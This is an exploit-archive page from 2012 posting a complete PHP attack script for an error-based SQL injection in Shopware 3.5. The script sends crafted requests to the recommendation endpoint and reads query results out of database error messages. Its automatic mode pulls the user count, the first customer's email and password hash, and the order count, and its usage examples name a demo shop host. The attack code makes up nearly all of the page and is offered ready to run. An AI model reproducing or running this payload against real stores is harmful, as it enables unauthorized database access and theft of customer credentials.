Home / exploitsPDF  

Shopware 3.5 SQL Injection

Posted on 16 July 2012

#!/usr/bin/php
<?php

# Exploit Title: Shopware 3.5 - SQL Injection
# Date: 13.07.2012
# Exploit Author: Kataklysmos
# Software Link: http://www.shopware.de/
# Version: 3.5

function http_req($host, $q)
{
 if(!$fs = fsockopen($host, 80))
 exit("Could not open HTTP- Connection to ".$host."

");

 $head = "GET /recommendation/bought/article/".urlencode("0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (".$q.") FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)")." HTTP/1.1
";
 $head .= "Host: ".$host."
";
 $head .= "Connection: Close

";

 fwrite($fs, $head);

 $ret = '';
 while(!feof($fs))
 $ret .= fgets($fs, 4096);
 fclose($fs);

 return $ret;
}

function mask($cont)
{
 if(preg_match('/Duplicate entry '(.*)1' for/', $cont, $m))
 return $m[1];
 else
 return false;
}

function space($x)
{
 $r = '';
 for($i = 0; $i < $x; $i++)
 $r .= ' ';
 return $r;
}

echo "
Exploit Title: Shopware 3.5 - SQL Injection
";
echo "Date: 13.07.2012
";
echo "Exploit Author: Kataklysmos
";
echo "Software Link: http://www.shopware.de/
";
echo "Version: 3.5

";

if(!isset($argv[2]))
{
 echo " Usage: 
";
 echo " ".$argv[0]." HOST --auto
";
 echo " ".$argv[0]." www.shopwaredemo.de --auto

";
 echo " ".$argv[0]." HOST QUERY
";
 echo " ".$argv[0]." www.shopwaredemo.de "SELECT COUNT(`id`) FROM `s_user`"
";
 echo " ".$argv[0]." www.shopwaredemo.de "SELECT `email` FROM `s_user` LIMIT 0,1"

";
 exit(1);
}

if($argv[2] != '--auto')
{
 $x = http_req($argv[1], $argv[2]);

 if(!$x = mask($x))
 exit("Your query failed!

");

 echo "Query:
 ".$argv[2]."
Return:
 ".$x."

";
}
else
{
 $task = array(array('Amount of registered users', 'SELECT COUNT(`id`) FROM `s_user`', null),
 array('E- Mail from first user', 'SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1', null),
 array('Password from first user', 'SELECT `password` FROM `s_user` LIMIT 0,1', null),
 array('Amount of orders', 'SELECT COUNT(`id`) FROM `s_order`', null)
 );

 for($i = 0; $i < count($task); $i++)
 {
 echo "[ .. ] Task: "".$task[$i][0].""";

 $x = http_req($argv[1], $task[$i][1]);
 if(!$x = mask($x))
 echo "
[fail] Task: "".$task[$i][0].""
";
 else
 {
 echo "
[ ok ] Task: "".$task[$i][0].""
";
 $task[$i][2] = $x;
 }
 }
 echo "
";

 for($i = 0; $i < count($task); $i++)
 echo $task[$i][0].space(26-strlen($task[$i][0])).' : '.$task[$i][2]."
";

 echo "
";
}

?>

 

TOP

Malware :

Exploits :